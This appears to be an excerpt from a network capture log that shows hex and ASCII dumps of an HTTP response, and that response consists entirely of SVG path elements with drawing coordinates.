                                                                                                                                                                              2023-09-15 05:27:49 UTC5251INData Raw: 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                              Data Ascii: -4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                              2023-09-15 05:27:49 UTC5267INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 32 2c 33 34 37 2e 32 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30
                                                                                                                                                                              Data Ascii: 2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M312,347.21a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0
                                                                                                                                                                              2023-09-15 05:27:49 UTC5283INData Raw: 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 0,1-.91,2.61,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0
                                                                                                                                                                              2023-09-15 05:27:49 UTC5299INData Raw: 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                              Data Ascii: 2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M367,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9"
                                                                                                                                                                              2023-09-15 05:27:49 UTC5315INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 35 32 2c 33 35 32 2e 32 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c
                                                                                                                                                                              Data Ascii: s-9" d="M402.52,352.23a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5331INData Raw: 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 32 2c 31 39 37 2e 39 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32
                                                                                                                                                                              Data Ascii: ,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M422,197.93a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2
                                                                                                                                                                              2023-09-15 05:27:49 UTC5347INData Raw: 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: -.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8,2.8,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1,.18,3.32"></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1
                                                                                                                                                                              2023-09-15 05:27:49 UTC5363INData Raw: 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 37 39 2c 33 34 39 2e 31 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                              Data Ascii: th class="cls-9" d="M492.79,349.18a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6
                                                                                                                                                                              2023-09-15 05:27:49 UTC5379INData Raw: 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 32 32 2c 31 39 34 2e 38 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 41 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e
                                                                                                                                                                              Data Ascii: ,.18,3.33"></path><path class="cls-9" d="M512.22,194.87a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1A2.8,2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.
                                                                                                                                                                              2023-09-15 05:27:49 UTC5395INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 41 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2c 35 34 33 2c 32 37 36 61 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: ,1-.91,2.6A2.94,2.94,0,0,1,543,276a2.82,2.82,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5411INData Raw: 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 30 37 2c 33 34 36 2e 31 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c
                                                                                                                                                                              Data Ascii: 0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M583.07,346.12a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5427INData Raw: 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                              Data Ascii: 8,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9
                                                                                                                                                                              2023-09-15 05:27:49 UTC5443INData Raw: 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: 2,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5459INData Raw: 2d 39 22 20 64 3d 22 4d 33 39 30 2e 32 34 2c 31 35 39 2e 31 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                              Data Ascii: -9" d="M390.24,159.13a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                              2023-09-15 05:27:49 UTC5475INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 38 33 2c 33 35 2e 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 34 30 32 2c 33 36 2e 35 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e
                                                                                                                                                                              Data Ascii: .67"></path><path class="cls-9" d="M405.83,35.3a1.62,1.62,0,0,1-.73,2.09A2.36,2.36,0,0,1,402,36.5a2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.
                                                                                                                                                                              2023-09-15 05:27:49 UTC5491INData Raw: 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 34 2e 31 35 2c 39 32 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37
                                                                                                                                                                              Data Ascii: 0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M434.15,92.74a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.7
                                                                                                                                                                              2023-09-15 05:27:49 UTC5507INData Raw: 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 34 37 2c 31 35 30 2e 31 39 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c
                                                                                                                                                                              Data Ascii: 0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M462.47,150.19a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,
